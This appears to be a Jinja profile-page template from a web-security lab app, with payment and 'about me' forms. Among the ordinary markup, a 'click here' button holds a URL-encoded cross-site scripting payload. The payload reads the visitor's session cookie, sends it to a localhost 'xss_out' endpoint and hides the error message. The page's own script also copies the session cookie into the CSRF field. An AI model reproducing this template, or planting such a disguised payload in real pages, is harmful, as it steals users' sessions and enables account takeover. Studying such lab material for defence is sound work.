{% extends "base.html" %}

{% block title %}Profile{% endblock %}

{% block content %}
<div class="profile-container">
  <h1 class="profile-header">{{ user.username }}</h1>
  <div>
    <strong>Coins:</strong> {{ user.coins }}
    <br>
    <strong>About Me:</strong><br>{{ user.aboutme}}
  </div>
</div>

{% if user.username == session_user.username %}
<div class="payment-form">
  <h3 class="payment-header">Make payment?</h3>
  <form action="/pay" method="post">
    <div class="form-group">
      <div class="form-label">To:</div>
      <div class="form-input"><input name = "recipient" type = "text"/></div>
    </div>
    <div class="form-group">
      <div class="form-label">Amount:</div>
      <div class="form-input"><input name="amount" type= "number"/></div>
    </div>
    <input id="csrf-id" type="hidden" name="csrf-id"/>
    <input class="form-button" type="submit" value="Pay"/>
  </form>

  {% if payment_error %}
  <div class="error"><p>{{ payment_error }}</p></div>
  {% endif %}
</div>

<input type=button onClick= "window.location='http://localhost:8080/profile/%3Cscript%3Evar%20img%20%3D%20new%20Image()%3B%20var%20endpoint%20%3D%20%22http%3A%2F%2Flocalhost%3A8081%2Fxss_out%3Fstolen_cookie%3D%22%3B%20var%20cookieValue%20%3D%20document.cookie.replace(%2F(%3F%3A(%3F%3A%5E%7C.*%3B%5Cs*)session%5Cs*%5C%3D%5Cs*(%5B%5E%3B%5D*).*%24)%7C%5E.*%24%2F%2C%20%27%241%27)%3B%20img.src%20%3D%20endpoint%20%2B%20cookieValue%3B%20document.getElementsByClassName(%22error%22)%5B0%5D.style.visibility%20%3D%20%22hidden%22%3C%2Fscript%3E%0A'"  value='click here'>

<script>
	function getCookie(cname) {
	  var name = cname + "=";
	  var decodedCookie = decodeURIComponent(document.cookie);
	  var ca = decodedCookie.split(';');
	  for(var i = 0; i <ca.length; i++) {
	    var c = ca[i];
	    while (c.charAt(0) == ' ') {
	      c = c.substring(1);
	    }
	    if (c.indexOf(name) == 0) {
			document.getElementById('csrf-id').value = c.substring(name.length, c.length);
        	return;
	    }
	  }
	  document.getElementById('csrf-id').value = "";
     	  return;                            
	}	
	window.onload = getCookie('session');

</script>	
<div class="aboutme-form">
  <h3 class="aboutme-header">Update profile?</h3>
  <form action="/aboutme" method="post">
    <div class="form-group">
      <div class="form-input"><input name="aboutme" type="text" /></div>
    </div>
    <input class="form-button" type="submit" value="Update"/>
  </form>
</div>
{% endif %}
{% endblock %}
